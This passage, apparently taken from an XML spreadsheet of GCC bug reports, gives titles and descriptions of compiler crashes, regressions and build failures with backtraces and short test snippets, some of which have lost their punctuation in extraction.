    <t>[8 Regression] ICE with C++11 and -flto</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on trunk when compiled with
-std=c++11 -g -flto:
========================================================================
struct A
{
  A()
  int foo()  }
}
A a
========================================================================
bug.cc:7:4: error: TYPE_CANONICAL of main variant is not main variant
 A a
    ^
 &lt;method_type 0x7fac2957f888
    type &lt;integer_type 0x7fac294417e0 int asm_written public type_6 SI
        size 
        unit size 
        align 32 symtab 692482528 alias set 2 canonical type 0x7fac294417e0 precision 32 min  max 
        pointer_to_this &gt;
    tree_4 tree_5 QI
    size  constant 8&gt;
    unit size  constant 1&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7fac2957f888 method basetype 
    arg-types &lt;tree_list 0x7fac29576d98
        value 
            asm_written unsigned DI
            size 
            unit size 
            align 64 symtab 692482368 alias set -1 canonical type 0x7fac2957f5e8&gt;
        chain &gt;&gt;&gt;
 &lt;method_type 0x7fac2957f7e0
    type &lt;integer_type 0x7fac294417e0 int asm_written public type_6 SI
        size 
        unit size 
        align 32 symtab 692482528 alias set 2 canonical type 0x7fac294417e0 precision 32 min  max 
        pointer_to_this &gt;
    QI
    size  constant 8&gt;
    unit size  constant 1&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7fac2957f7e0 method basetype 
    arg-types &lt;tree_list 0x7fac29576d98
        value 
            asm_written unsigned DI
            size 
            unit size 
            align 64 symtab 692482368 alias set -1 canonical type 0x7fac2957f5e8&gt;
        chain &gt;&gt;&gt;
 &lt;method_type 0x7fac2957f930
    type &lt;integer_type 0x7fac294417e0 int asm_written public type_6 SI
        size 
        unit size 
        align 32 symtab 692482528 alias set 2 canonical type 0x7fac294417e0 precision 32 min  max 
        pointer_to_this &gt;
    QI
    size  constant 8&gt;
    unit size  constant 1&gt;
    align 8 symtab 0 alias set -1 canonical type 0x7fac2957f888
    attributes &lt;tree_list 0x7fac29576dc0
        purpose &lt;identifier_node 0x7fac295948f0 __warn_unused_result__
            bindings 
            local bindings &gt;&gt; method basetype 
    arg-types &lt;tree_list 0x7fac29576d98
        value 
            asm_written unsigned DI
            size 
            unit size 
            align 64 symtab 692482368 alias set -1 canonical type 0x7fac2957f5e8&gt;
        chain &gt;&gt;&gt;
bug.cc:7:4: internal compiler error: verify_type failed
0xfa84c2 verify_type(tree_node const*)
	../../gcc/gcc/tree.c:13900
0xfaa34b free_lang_data_in_cgraph
	../../gcc/gcc/tree.c:5984
0xfaa34b free_lang_data
	../../gcc/gcc/tree.c:6014
0xfaa34b execute
	../../gcc/gcc/tree.c:6063
Please submit a full bug report [etc.]
This is a regression w.r.t GCC 5.3.0.
The bug makes it impossible to compile Qt (Qt 5.4.2) programs with -flto because QString contains such a pattern.</t>
  </si>
  <si>
    <t>GCC-66861</t>
  </si>
  <si>
    <t>[5/6 Regression] Segmentation fault in gcc/testsuite/gfortran.dg/streamio_5.f90</t>
  </si>
  <si>
    <t>Since gcc-5 I get a lot of fortran testsuite failures. Most of these with IO involved and causing a timeout. This an regression. For trunk I'm not sure. I haven't had the time to build trunk yet. But I expect it has the same issue.
$ gfortran.exe -v
Es werden eingebaute Spezifikationen verwendet.
COLLECT_GCC=D:\opt\devel\gnu\gcc\MINGW_NT\x86_64-w64-mingw32\mingw-w64-runtime-trunk-svn\gcc-5.1.1\bin\gfortran.exe
COLLECT_LTO_WRAPPER=d:/opt/devel/gnu/gcc/mingw_nt/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-5.1.1/bin/../libexec/gcc/x86_64-w64-mingw32/5.1.1/lto-wrapper.exe
Ziel: x86_64-w64-mingw32
Konfiguriert mit: ../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/configure --prefix=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-5.1.1 --with-gnu-as --with-as=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-5.1.1/bin/as --with-gnu-ld --with-ld=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-5.1.1/bin/ld --build=x86_64-w64-mingw32 --enable-threads=posix --enable-languages=cadac++fortranjavaltoobjcobj-c++ --with-gmp-include=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/include --with-gmp-lib=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/lib64 --with-mpfr-include=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/include --with-mpfr-lib=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/lib64 --with-mpc-include=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/include --with-mpc-lib=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/lib64 --with-isl-include=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/include --with-isl-lib=/opt/devel/SCRATCH/tmp.kzqcdNeWDQ/install/lib64 --with-local-prefix=/opt/devel/tec/devel/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-5.1.1 --enable-libgomp --enable-fully-dynamic-string --disable-multilib --enable-checking=release --disable-werror --with-sysroot=/x86_64-w64-trunk
Thread-Modell: posix
gcc-Version 5.1.1 20150712 [gcc-5-branch revision 225722] (GCC)
gfortran.exe -O2 /opt/devel/gnu/src/gcc/gcc-5-svn/gcc/testsuite/gfortran.dg/streamio_5.f90
$ gdb a.exe
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-w64-mingw32.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word...
Reading symbols from a.exe...done.
(gdb) run
Starting program: D:\msys64\home\rainer\temp\a.exe
[New Thread 4676.0x529c]
Program received signal SIGSEGV Segmentation fault.
0x000007fefd675960 in strcmp () from C:\Windows\system32\msvcrt.dll
(gdb) where
#0  0x000007fefd675960 in strcmp () from C:\Windows\system32\msvcrt.dll
#1  0x000000006f6eaa94 in find_file0 (u=
    id=id@entry=162129586587129478 path=path@entry=0x786300 teststream)
    at ../../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/libgfortran/io/unix.c:1573
#2  0x000000006f6c9209 in _gfortrani_find_file (file=
    file_len=)
    at ../../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/libgfortran/io/unix.c:1615
#3  0x000000006f6cf385 in _gfortrani_new_unit (opp=opp@entry=0x22fc10
    u=u@entry=0x785ff0 flags=flags@entry=0x22fb80)
    at ../../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/libgfortran/io/open.c:486
#4  0x000000006f6bd922 in already_open (flags=
    u= opp=)
    at ../../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/libgfortran/io/open.c:672
#5  _gfortran_st_open (opp=0x22fc10)
    at ../../../../../../../../opt/devel/gnu/src/gcc-mingw-w64/gcc-5.1.1/libgfortran/io/open.c:837
#6  0x000000000040179c in MAIN__ ()
#7  0x0000000000403080 in main ()
(gdb) exit
Undefined command: exit.  Try help.
(gdb) quit
A debugging session is active.
        Inferior 1 [process 4676] will be killed.
Quit anyway? (y or n) [answered Y input not from terminal]
So the crash appears in msvcrt.dll. But the call looks suspicious:
find_file0 (u= id=id@entry=162129586587129478 path=path@entry=0x786300 teststream)
Using gcc-4.9.3 is fine no issue here.</t>
  </si>
  <si>
    <t>GCC-59726</t>
  </si>
  <si>
    <t>[4.9 Regression] r206148 exposes broken vec_perm for big-endian aarch64 ICE at -O3</t>
  </si>
  <si>
    <t>Commit 206148 (PR tree-optimization/59544) causes regressions on AArch64 BE target (aarch64_be-none-elf) in testcases:
gcc.c-torture/compile/20000629-1.c
gcc.c-torture/compile/20080812-1.c
gcc.c-torture/execute/loop-11.c
gcc.c-torture/execute/loop-2c.c
gcc.c-torture/execute/loop-2d.c
gcc.c-torture/unsorted/sound.c
when compiled with
-O3 -fomit-frame-pointer
-O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
-O3 -fomit-frame-pointer -funroll-loops
-O3 -g
For instance:
/aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/testsuite/gcc.c-torture/compile/20000629-1.c: In function 'bar':
/aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/testsuite/gcc.c-torture/compile/20000629-1.c:25:12: internal compiler error: in aarch64_expand_vec_perm at config/aarch64/aarch64.c:7744
0xde31af aarch64_expand_vec_perm(rtx_def* rtx_def* rtx_def* rtx_def*)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/config/aarch64/aarch64.c:7744
0xe2cb03 gen_vec_permv16qi(rtx_def* rtx_def* rtx_def* rtx_def*)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/config/aarch64/aarch64-simd.md:3846
0x9ef830 insn_gen_fn::operator()(rtx_def* rtx_def* rtx_def* rtx_def*) const
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/recog.h:286
0x9dbe02 maybe_gen_insn(insn_code unsigned int expand_operand*)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/optabs.c:8263
0x9dc1cc maybe_expand_insn(insn_code unsigned int expand_operand*)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/optabs.c:8293
0x9df85f expand_vec_perm_1
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/optabs.c:6568
0x9ef2bb expand_vec_perm(machine_mode rtx_def* rtx_def* rtx_def* rtx_def*)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/optabs.c:6701
0x7c9d27 expand_expr_real_2(separate_ops* rtx_def* machine_mode expand_modifier)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:9097
0x7be918 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:10575
0x7be9ea expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:7930
0x7b921d expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:9381
0x7be9ea expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def**)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:7930
0x7c33c9 store_expr(tree_node* rtx_def* int bool)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:5328
0x7b5cfb expand_assignment(tree_node* tree_node* bool)
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/expr.c:5114
0x6c44a6 expand_gimple_stmt_1
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/cfgexpand.c:3210
0x6c48cc expand_gimple_stmt
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/cfgexpand.c:3306
0x6c5bac expand_gimple_basic_block
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/cfgexpand.c:5146
0x6c6b25 gimple_expand_cfg
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/cfgexpand.c:5712
0x6c7156 execute
        /aci-gcc-fsf/sources/gcc-fsf/trunk/gcc/cfgexpand.c:5932</t>
  </si>
  <si>
    <t>GCC-36573</t>
  </si>
  <si>
    <t>s-intman.adb:232:50: SA_ONSTACK is undefined</t>
  </si>
  <si>
    <t>/xxx/gnu/gcc/objdir/./gcc/xgcc -B/xxx/gnu/gcc/objdir/./gcc/ -B/opt/gnu/gcc/gcc-4
.4.0/hppa1.1-hp-hpux10.20/bin/ -B/opt/gnu/gcc/gcc-4.4.0/hppa1.1-hp-hpux10.20/lib
/ -isystem /opt/gnu/gcc/gcc-4.4.0/hppa1.1-hp-hpux10.20/include -isystem /opt/gnu
/gcc/gcc-4.4.0/hppa1.1-hp-hpux10.20/sys-include -c -g -O2 -mdisable-indexing -D_
X_HPUX10     -W -Wall -gnatpg  s-intman.adb -o s-intman.o
s-intman.adb:232:50: SA_ONSTACK is undefined
_INCLUDE_XOPEN_SOURCE_EXTENDED needs to be defined to provide this definition
in sys/signal.h.</t>
  </si>
  <si>
    <t>GCC-1161</t>
  </si>
  <si>
    <t>compiler permits volatile final variables</t>
  </si>
  <si>
    <t xml:space="preserve">From: tromey@sourceware.cygnus.com
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: gcj/164
Date: 7 Mar 2000 00:49:19 -0000
 CVSROOT:	/cvs/java
 Module name:	libgcj
 Changes by:	tromey@sourceware.cygnus.com	00/03/06 16:49:19
 Modified files:
 	libjava/testsuite: ChangeLog 
 Added files:
 	libjava/testsuite/libjava.compile: PR164.java PR164.xfail 
 Log message:
 	Test for PR gcj/164:
 	* libjava.compile/PR164.xfail: New file.
 	* libjava.compile/PR164.java: New file.
 Patches:
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/ChangeLog.diff?cvsroot=java&amp;r1=1.62&amp;r2=1.63
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/libjava.compile/PR164.java.diff?cvsroot=java&amp;r1=NONE&amp;r2=1.1
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/libjava.compile/PR164.xfail.diff?cvsroot=java&amp;r1=NONE&amp;r2=1.1
</t>
  </si>
  <si>
    <t>GCC-46950</t>
  </si>
  <si>
    <t>Stage 3 ada bootstrap error on i686-apple-darwin9</t>
  </si>
  <si>
    <t>/Users/dave/gnu/gcc/objdir/./gcc/xgcc -B/Users/dave/gnu/gcc/objdir/./gcc/ -B/opt
/gnu/gcc/gcc-4.6.0/i686-apple-darwin9/bin/ -B/opt/gnu/gcc/gcc-4.6.0/i686-apple-d
arwin9/lib/ -isystem /opt/gnu/gcc/gcc-4.6.0/i686-apple-darwin9/include -isystem 
/opt/gnu/gcc/gcc-4.6.0/i686-apple-darwin9/sys-include    -c -g -O2  -fPIC -pipe 
 -W -Wall -gnatpg  -g -O1 -fno-inline \
              -fno-toplevel-reorder  a-except.adb -o a-except.o
...
raised STORAGE_ERROR : stack overflow
:917:non-relocatable subtraction expression L_system__soft_links__abort_defer$
non_lazy_ptr minus L00000000027$pb
:917:symbol: L_system__soft_links__abort_defer$non_lazy_ptr can't be undefined
 in a subtraction expression
:885:non-relocatable subtraction expression L_system__soft_links__abort_defer$
non_lazy_ptr minus L00000000026$pb
:885:symbol: L_system__soft_links__abort_defer$non_lazy_ptr can't be undefined
 in a subtraction expression
:876:non-relocatable subtraction expression L_constraint_error$non_lazy_ptr m
inus L00000000026$pb
:876:symbol: L_constraint_error$non_lazy_ptr can't be undefined in a subtracti
on expression
:2057:non-relocatable subtraction expression L_constraint_error$non_lazy_ptr 
minus L00000000025$pb
:2057:symbol: L_constraint_error$non_lazy_ptr can't be undefined in a subtract
ion expression
:2033:non-relocatable subtraction expression L_constraint_error$non_lazy_ptr 
minus L00000000024$pb
:2033:symbol: L_constraint_error$non_lazy_ptr can't be undefined in a subtract
ion expression
:1634:non-relocatable subtraction expression L___gl_exception_tracebacks$non_l
azy_ptr minus L00000000019$pb
:1634:symbol: L___gl_exception_tracebacks$non_lazy_ptr can't be undefined in a
 subtraction expression
:1060:non-relocatable subtraction expression L_program_error$non_lazy_ptr min
us L00000000016$pb
:1060:symbol: L_program_error$non_lazy_ptr can't be undefined in a subtraction
 expression
:931:non-relocatable subtraction expression L_system__soft_links__get_current_
excep$non_lazy_ptr minus L00000000015$pb
:931:symbol: L_system__soft_links__get_current_excep$non_lazy_ptr can't be und
efined in a subtraction expression
:901:non-relocatable subtraction expression L_system__soft_links__task_termina
tion_handler$non_lazy_ptr minus L00000000014$pb
:901:symbol: L_system__soft_links__task_termination_handler$non_lazy_ptr can't
 be undefined in a subtraction expression
:895:non-relocatable subtraction expression L_system__soft_links__get_current_
excep$non_lazy_ptr minus L00000000014$pb
:895:symbol: L_system__soft_links__get_current_excep$non_lazy_ptr can't be und
efined in a subtraction expression
:870:non-relocatable subtraction expression L_system__soft_links__get_current_
excep$non_lazy_ptr minus L00000000013$pb
:870:symbol: L_system__soft_links__get_current_excep$non_lazy_ptr can't be und
efined in a subtraction expression
:787:non-relocatable subtraction expression L_system__soft_links__unlock_task$
non_lazy_ptr minus L00000000012$pb
:787:symbol: L_system__soft_links__unlock_task$non_lazy_ptr can't be undefined
 in a subtraction expression
:745:non-relocatable subtraction expression L_system__soft_links__lock_task$no
n_lazy_ptr minus L00000000012$pb
:745:symbol: L_system__soft_links__lock_task$non_lazy_ptr can't be undefined i
n a subtraction expression
:736:non-relocatable subtraction expression L_system__standard_library__except
ion_trace$non_lazy_ptr minus L00000000012$pb
:736:symbol: L_system__standard_library__exception_trace$non_lazy_ptr can't be
 undefined in a subtraction expression
:730:non-relocatable subtraction expression L_system__standard_library__except
ion_trace$non_lazy_ptr minus L00000000012$pb
:730:symbol: L_system__standard_library__exception_trace$non_lazy_ptr can't be
 undefined in a subtraction expression
:541:non-relocatable subtraction expression L_system__soft_links__get_current_
excep$non_lazy_ptr minus L00000000011$pb
:541:symbol: L_system__soft_links__get_current_excep$non_lazy_ptr can't be und
efined in a subtraction expression
{standard input}:2691:non-relocatable subtraction expression L_system__soft_li
nks__get_current_excep$non_lazy_ptr minus L00000000010$pb
{standard input}:2691:symbol: L_system__soft_links__get_current_excep$non_lazy_
ptr can't be undefined in a subtraction expression
{standard input}:2041:non-relocatable subtraction expression L_system__soft_li
nks__traceback_decorator_wrapper$non_lazy_ptr minus L00000000008$pb
{standard input}:2041:symbol: L_system__soft_links__traceback_decorator_wrapper
$non_lazy_ptr can't be undefined in a subtraction expression
{standard input}:2013:non-relocatable subtraction expression L_system__standar
d_library__local_partition_id$non_lazy_ptr minus L00000000007$pb
{standard input}:2013:symbol: L_system__standard_library__local_partition_id$no
n_lazy_ptr can't be undefined in a subtraction expression
{standard input}:1982:non-relocatable subtraction expression L_system__soft_li
nks__get_current_excep$non_lazy_ptr minus L00000000007$pb
{standard input}:1982:symbol: L_system__soft_links__get_current_excep$non_lazy_
ptr can't be undefined in a subtraction expression
{standard input}:1844:non-relocatable subtraction expression L_system__standar
d_library__local_partition_id$non_lazy_ptr minus L00000000006$pb
{standard input}:1844:symbol: L_system__standard_library__local_partition_id$no
n_lazy_ptr can't be undefined in a subtraction expression
{standard input}:1826:non-relocatable subtraction expression L_system__soft_li
nks__get_current_excep$non_lazy_ptr minus L00000000006$pb
{standard input}:1826:symbol: L_system__soft_links__get_current_excep$non_lazy_
ptr can't be undefined in a subtraction expression
{standard input}:343:non-relocatable subtraction expression _h.3287 minus L0
0000000001$pb
{standard input}:343:symbol: _h.3287 can't be undefined in a subtraction expre
ssion
:unknown:Undefined local symbol L_system__soft_links__get_current_excep$non_lazy
_ptr
:unknown:Undefined local symbol L_system__standard_library__local_partition_id$n
on_lazy_ptr
:unknown:Undefined local symbol L_system__soft_links__traceback_decorator_wrappe
r$non_lazy_ptr
:unknown:Undefined local symbol L_system__standard_library__exception_trace$non_
lazy_ptr
:unknown:Undefined local symbol L_system__soft_links__lock_task$non_lazy_ptr
:unknown:Undefined local symbol L_system__soft_links__unlock_task$non_lazy_ptr
:unknown:Undefined local symbol L_system__soft_links__task_termination_handler$n
on_lazy_ptr
:unknown:Undefined local symbol L_program_error$non_lazy_ptr
:unknown:Undefined local symbol L___gl_exception_tracebacks$non_lazy_ptr
:unknown:Undefined local symbol L_constraint_error$non_lazy_ptr
:unknown:Undefined local symbol L_system__soft_links__abort_defer$non_lazy_ptr
make[6]: *** [a-except.o] Error 1
make[5]: *** [gnatlib] Error 2
make[4]: *** [gnatlib-shared-darwin] Error 2
make[3]: *** [gnatlib-shared] Error 2
make[2]: *** [gnatlib-shared] Error 2
libtool: compile:  /Users/dave/gnu/gcc/objdir/./gcc/xgcc -B/Users/dave/gnu/gcc/o
bjdir/./gcc/ -B/opt/gnu/gcc/gcc-4.6.0/i686-apple-darwin9/bin/ -B/opt/gnu/gcc/gcc
-4.6.0/i686-apple-darwin9/lib/ -isystem /opt/gnu/gcc/gcc-4.6.0/i686-apple-darwin
9/include -isystem /opt/gnu/gcc/gcc-4.6.0/i686-apple-darwin9/sys-include -m64 -D
HAVE_CONFIG_H -I. -I../../../../gcc/libquadmath -g -O2 -m64 -MT math/frexpq.lo -
MD -MP -MF math/.deps/frexpq.Tpo -c ../../../../gcc/libquadmath/math/frexpq.c  -
fno-common -DPIC -o math/.libs/frexpq.o
make[1]: *** [all-target-libada] Error 2
make[1]: *** Waiting for unfinished jobs....
dave@macpro-xp:~/gnu/gcc/objdir/prev-gcc$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: i686-apple-darwin9
Configured with: ../gcc/configure --build=i686-apple-darwin9 --host=i686-apple-darwin9 --target=i686-apple-darwin9 --with-tune=generic --prefix=/opt/gnu/gcc/gcc-4.6.0 --with-gmp=/opt/gnu/gcc/gcc-4.6.0 --enable-debug=no --disable-nls --enable-languages=cc++objcfortranobj-c++javaada --enable-threads=posix --enable-__cxa_atexit --enable-java-gc=boehm
Thread model: posix
gcc version 4.6.0 20101214 (experimental) [trunk revision 167825] (GCC)</t>
  </si>
  <si>
    <t>GCC-31529</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in cgraph_expand_function with IMA</t>
  </si>
  <si>
    <t>trunk revision 123693
$ /scratch/obj.i686/gcc-4.3/./prev-gcc/xgcc -v
Using built-in specs.
Target: i686-linux-gnu
Configured with: ../../src/gcc-4.3/configure -v --enable-languages=cc++fortrantreelang --prefix=/opt/i686/gcc-4.3/ --enable-shared --with-system-zlib --libexecdir=/opt/i686/gcc-4.3/lib --enable-nls --without-included-gettext --enable-threads=posix --program-suffix=-4.3-HEAD --enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --disable-werror --enable-checking=yes --enable-debug --with-gmp=/opt/i686/gmp-4.2.1/ --with-mpfr=/opt/i686/mpfr-2.2.1 --disable-multilib --enable-intermodule i686-linux-gnu
Thread model: posix
gcc version 4.3.0 20070410 (experimental)
Gives:
[snip]
../../../src/gcc-4.3/gcc/config/i386/i386.c -o libbackend.o  \
          -DBASEVER=\4.3.0\ -DDATESTAMP=\ 20070410\ \
          -DDEVPHASE=\ (experimental)\ -combine
../../../src/gcc-4.3/gcc/config/i386/i386.c:22057: internal compiler error: in cgraph_expand_function at cgraphunit.c:1005</t>
  </si>
  <si>
    <t>GCC-65418</t>
  </si>
  <si>
    <t>[5 Regression] vim miscompilation</t>
  </si>
  <si>
    <t>__attribute__((noinline noclone)) int
foo (int x)
{
  if (x == '(' - 256 || x == '|' - 256 || x == '&amp;' - 256 || x == 'n' - 256)
     return 1
  return 0
}
int
main ()
{
  if (foo ('n' - 256) != 1
      || foo ('(' - 256) != 1
      || foo ('|' - 256) != 1
      || foo ('&amp;' - 256) != 1
      || foo ('q' - 256) != 0)
    __builtin_abort ()
  return 0
}
is miscompiled at -O2 starting with r216393.</t>
  </si>
  <si>
    <t>GCC-1307</t>
  </si>
  <si>
    <t>Throwable.fillInStackTrace dumps core if backtrace fails</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: tromey-&gt;aph
Responsible-Changed-Why: Andrew handles backtraces.
    FWIW I think a runtime check would be best.
</t>
  </si>
  <si>
    <t>GCC-71362</t>
  </si>
  <si>
    <t>Wrong position for error: size of unnamed array is negative</t>
  </si>
  <si>
    <t>Source code:
----------------------------------------------------------------------
int main()
{
  123 + sizeof(int[-1])
}
----------------------------------------------------------------------
Results:
----------------------------------------------------------------------
$ gcc -std=c11 -pedantic test.c &amp;&amp; ./a.out
test.c: In function â€˜mainâ€™:
test.c:3:3: error: size of unnamed array is negative
   123 + sizeof(int[-1])
   ^~~
----------------------------------------------------------------------
gcc version: gcc (GCC) 7.0.0 20160531 (experimental)</t>
  </si>
  <si>
    <t>GCC-61657</t>
  </si>
  <si>
    <t>Undefined behavior in loop-iv.c</t>
  </si>
  <si>
    <t>Seen during bootstrap-ubsan bootstrap/regtest.  E.g.
./cc1 -O3 -fomit-frame-pointer -funroll-loops gcc.c-torture/compile/pr42049.c
../../gcc/loop-iv.c:2626:14: runtime error: signed integer overflow: 9223372036854775806 - -9223372036854775808 cannot be represented in type 'long int'
../../gcc/loop-iv.c:2288:24: runtime error: signed integer overflow: 9223372036854775807 - -9223372036854775808 cannot be represented in type 'long int'
but seen also during the bootstrap itself.
E.g. on line 2626:
          inc = INTVAL (iv0.step) - INTVAL (iv1.step)
          if (CONST_INT_P (iv1.base))
            up = INTVAL (iv1.base)
          else
            up = INTVAL (mode_mmax) - inc
          down = INTVAL (CONST_INT_P (iv0.base)
                         ? iv0.base
                         : mode_mmin)
          max = (up - down) / inc + 1
inc is 1 both iv0.base and iv1.base are non-CONST_INT and thus up is
0x7ffffffffffffffeLL and down is 0x8000000000000000LL (-LONG_MIN).
The subtraction and division surely can be performed in UHWI or perhaps widest_int just not sure what is the right thing if there is any overflow or if max is negative in the end - shall we just not record the bound at all?</t>
  </si>
  <si>
    <t>GCC-81262</t>
  </si>
  <si>
    <t>[8 Regression] verify_flow_info failed for asmgoto test-case with -fsanitize=undefined</t>
  </si>
  <si>
    <t>Starting from r249070 following test-case fails:
$ g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/asmgoto1.C -fsanitize=unreachable -O2 -c
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/asmgoto1.C: In function â€˜int bar(int)â€™:
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/asmgoto1.C:32:1: error: fallthru edge crosses section boundary in bb 6
 }
 ^
during RTL pass: bbpart
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/ext/asmgoto1.C:32:1: internal compiler error: verify_flow_info failed
0xc15932 verify_flow_info()
	../../gcc/cfghooks.c:259
0x1089f20 execute_function_todo
	../../gcc/passes.c:2001
0x1088e92 do_per_function
	../../gcc/passes.c:1655
0x108a0a0 execute_todo
	../../gcc/passes.c:2043</t>
  </si>
  <si>
    <t>GCC-53681</t>
  </si>
  <si>
    <t>s390 bootstrap failure since 187965</t>
  </si>
  <si>
    <t>int
__gcov_execle (const char *path char *arg ...)
{
  __builtin_va_list ap aq
  while (__builtin_va_arg (ap char *))
      length++
}
cc1 -fpreprocessed t.c -quiet
t.c: In function â€˜__gcov_execleâ€™:
t.c:6:7: error: â€˜lengthâ€™ undeclared (first use in this function)
       length++
       ^
t.c:6:7: note: each undeclared identifier is reported only once for each function it appears in
t.c:5:32: internal compiler error: Segmentation fault
   while (__builtin_va_arg (ap char *))
                                ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) r
Starting program: /home/andreas/patched/gcc-head-build/gcc/cc1 -fpreprocessed t.c -quiet
t.c: In function â€˜__gcov_execleâ€™:
t.c:6:7: error: â€˜lengthâ€™ undeclared (first use in this function)
       length++
       ^
t.c:6:7: note: each undeclared identifier is reported only once for each function it appears in
Program received signal SIGSEGV Segmentation fault.
0x0000000082618f00 in mark_sym_for_renaming (sym=0x3fff7f3a320)
    at /home/andreas/patched/gcc-head/gcc/tree-into-ssa.c:2997
2997      bitmap_set_bit (SYMS_TO_RENAME (cfun) DECL_UID (sym))
(gdb) bt
#0  0x0000000082618f00 in mark_sym_for_renaming (sym=0x3fff7f3a320)
    at /home/andreas/patched/gcc-head/gcc/tree-into-ssa.c:2997
#1  0x0000000083c03f98 in s390_gimplify_va_arg (valist=0x3fff8026300 type=0x3fff7f549d8 pre_p=0x3ffffffd7d0 
    post_p=0x3ffffffa698) at /home/andreas/patched/gcc-head/gcc/config/s390/s390.c:9047
#2  0x000000008057b192 in gimplify_va_arg_expr (expr_p=0x3fff8026290 pre_p=0x3ffffffd7d0 post_p=0x3ffffffa698)
    at /home/andreas/patched/gcc-head/gcc/builtins.c:4509
#3  0x0000000081256160 in gimplify_expr (expr_p=0x3fff8026290 pre_p=0x3ffffffd7d0 post_p=0x3ffffffa698 
    gimple_test_f=0x8109c684  fallback=1) at /home/andreas/patched/gcc-head/gcc/gimplify.c:7178
#4  0x000000008125b52a in gimplify_expr (expr_p=0x3fff802a020 pre_p=0x3ffffffd7d0 post_p=0x3ffffffa698 
    gimple_test_f=0x8109aca8  fallback=1)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:7743
#5  0x0000000081233282 in gimplify_cond_expr (expr_p=0x3fff7ffff28 pre_p=0x3ffffffd7d0 fallback=0)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:3240
#6  0x0000000081255808 in gimplify_expr (expr_p=0x3fff7ffff28 pre_p=0x3ffffffd7d0 post_p=0x3ffffffbcf8 
    gimple_test_f=0x8123f6a8  fallback=0) at /home/andreas/patched/gcc-head/gcc/gimplify.c:7085
#7  0x00000000812474e8 in gimplify_stmt (stmt_p=0x3fff7ffff28 seq_p=0x3ffffffd7d0)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:5662
#8  0x00000000812217e0 in gimplify_statement_list (expr_p=0x3fff802a060 pre_p=0x3ffffffd7d0)
    at /home/andreas/patched/gcc-head/gcc/gimplify.c:1529
#9  0x00000000812597d2 in gimplify_expr (expr_p=0x3fff802a060 pre_p=0x3ffffffd7d0 post_p=0x3ffffffcb10 
